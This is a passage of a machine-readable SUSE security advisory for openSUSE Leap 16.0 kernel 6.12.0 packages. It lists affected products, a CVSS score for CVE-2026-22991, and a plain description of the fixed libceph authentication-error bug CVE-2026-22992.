"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
